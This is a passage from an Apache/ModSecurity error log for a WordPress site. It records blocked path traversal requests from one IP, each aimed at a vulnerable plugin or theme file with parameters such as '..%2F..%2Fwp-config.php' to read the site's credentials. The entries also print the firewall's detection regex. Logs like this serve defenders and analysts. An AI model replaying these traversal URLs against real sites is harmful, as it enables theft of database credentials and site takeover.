"Y8DxDaGMrWzzUVMdEhcLxwAAAMI"] [Fri Jan 13 00:50:05.174767 2023] [:error] [pid 31043:tid 140315138635520] [client 185.206.224.212:42832] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-table/js/wptable-button.phpp"] [unique_id "Y8DxDcx9A9c0KkSpLadQAgAAAJc"] [Fri Jan 13 00:50:05.289225 2023] [:error] [pid 31041:tid 140315247740672] [client 185.206.224.212:42834] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"] [unique_id "Y8DxDcPRCDYHCWWhHpAjqwAAAAo"] [Fri Jan 13 00:50:05.409626 2023] [:error] [pid 31042:tid 140315130242816] [client 185.206.224.212:42836] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wpeasystats/export.php?homep=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpeasystats/export.php"] [unique_id "Y8DxDY6vAq65Ygpdg5ObNgAAAFg"] [Fri Jan 13 00:50:05.533473 2023] [:error] [pid 31043:tid 140315272918784] [client 185.206.224.212:42838] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "Y8DxDcx9A9c0KkSpLadQAwAAAIc"] [Fri Jan 13 00:50:05.648340 2023] [:error] [pid 31041:tid 140315298096896] [client 185.206.224.212:42840] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zingiri-forum/mybb/memberlist.php?language=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zingiri-forum/mybb/memberlist.php"] [unique_id "Y8DxDcPRCDYHCWWhHpAjrAAAAAQ"] [Fri Jan 13 00:50:05.767340 2023] [:error] [pid 31042:tid 140315163813632] [client 185.206.224.212:42842] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php"] [unique_id "Y8DxDY6vAq65Ygpdg5ObNwAAAFQ"] [Fri Jan 13 00:50:05.951375 2023] [:error] [pid 31476:tid 140315397105408] [client 185.206.224.212:42844] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/functions.php on line 8 [Fri Jan 13 00:50:05.951563 2023] [:error] [pid 31476:tid 140315397105408] [client 185.206.224.212:42844] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/functions.php on line 8 [Fri Jan 13 00:50:05.951687 2023] [:error] [pid 31476:tid 140315397105408] [client 185.206.224.212:42844] PHP Warning: require(ABSPATHWPINC/option.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/functions.php on line 8 [Fri Jan 13 00:50:05.951812 2023] [:error] [pid 31476:tid 140315397105408] [client 185.206.224.212:42844] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/option.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/functions.php on line 8 [Fri Jan 13 00:50:06.077939 2023] [:error] [pid 31476:tid 140315256133376] [client 185.206.224.212:42846] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/multi-plugin-installer/mpi_download.php?filepath=..%2F..%2F..%2F&filename=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/multi-plugin-installer/mpi_download.php"] [unique_id "Y8DxDqGMrWzzUVMdEhcLyQAAAMk"] [Fri Jan 13 00:50:06.194576 2023] [:error] [pid 31476:tid 140315230955264] [client 185.206.224.212:42848] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-document-embedder/libs/pdf.php"] [unique_id "Y8DxDqGMrWzzUVMdEhcLygAAAMw"] [Fri Jan 13 00:50:06.330219 2023] [:error] [pid 31476:tid 140315205777152] [client 185.206.224.212:42850] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/file-away/lib/cls/class.fileaway_downloader.php?fileaway=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/file-away/lib/cls/class.fileaway_downloader.php"] [unique_id "Y8DxDqGMrWzzUVMdEhcLywAAAM8"] [Fri Jan 13 00:50:07.190310 2023] [:error] [pid 31476:tid 140315405498112] [client 185.206.224.212:42854] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/document_manager/views/file_download.php?fname=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/document_manager/views/file_download.php"] [unique_id "Y8DxD6GMrWzzUVMdEhcLzQAAAMA"] [Fri Jan 13 00:50:07.308945 2023] [:error] [pid 31476:tid 140315130242816] [client 185.206.224.212:42856] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/download-manager/views/file_download.php?fname=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/download-manager/views/file_download.php"] [unique_id "Y8DxD6GMrWzzUVMdEhcLzgAAANg"] [Fri Jan 13 00:50:07.423676 2023] [:error] [pid 31043:tid 140315188991744] [client 185.206.224.212:42858] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "Y8DxD8x9A9c0KkSpLadQBAAAAJE"] [Fri Jan 13 00:50:07.539203 2023] [:error] [pid 31043:tid 140315172206336] [client 185.206.224.212:42860] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php"] [unique_id "Y8DxD8x9A9c0KkSpLadQBQAAAJM"] [Fri Jan 13 00:50:07.663218 2023] [:error] [pid 31043:tid 140315306489600] [client 185.206.224.212:42862] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mac-dock-gallery/macdownload.php"] [unique_id "Y8DxD8x9A9c0KkSpLadQBgAAAIM"] [Fri Jan 13 00:50:08.569144 2023] [:error] [pid 31476:tid 140315155420928] [client 185.206.224.212:42868] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-e-commerce/wpsc-includes/misc.functions.php"] [unique_id "Y8DxEKGMrWzzUVMdEhcL0AAAANU"] [Fri Jan 13 00:50:08.684466 2023] [:error] [pid 31041:tid 140315388712704] [client 185.206.224.212:42870] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "Y8DxEMPRCDYHCWWhHpAjrQAAAAI"] [Fri Jan 13 00:50:08.803558 2023] [:error] [pid 31042:tid 140315155420928] [client 185.206.224.212:42872] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "Y8DxEI6vAq65Ygpdg5ObOAAAAFU"] [Fri Jan 13 00:50:08.918040 2023] [:error] [pid 31043:tid 140315388712704] [client 185.206.224.212:42874] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "Y8DxEMx9A9c0KkSpLadQCAAAAII"] [Fri Jan 13 00:50:09.033395 2023] [:error] [pid 31043:tid 140315230955264] [client 185.206.224.212:42876] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "Y8DxEcx9A9c0KkSpLadQCQAAAIw"] [Fri Jan 13 00:50:09.148025 2023] [:error] [pid 31043:tid 140315239347968] [client 185.206.224.212:42878] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=..%2F..%2F..%2Fwp-config.php&info=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cip4-folder-download-widget/cip4-download.php"] [unique_id "Y8DxEcx9A9c0KkSpLadQCgAAAIs"] [Fri Jan 13 00:50:10.071247 2023] [:error] [pid 31042:tid 140315197384448] [client 185.206.224.212:42882] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/duena/download.php?f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/duena/download.php"] [unique_id "Y8DxEo6vAq65Ygpdg5ObOQAAAFA"] [Fri Jan 13 00:50:10.192090 2023] [:error] [pid 31043:tid 140315214169856] [client 185.206.224.212:42884] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match 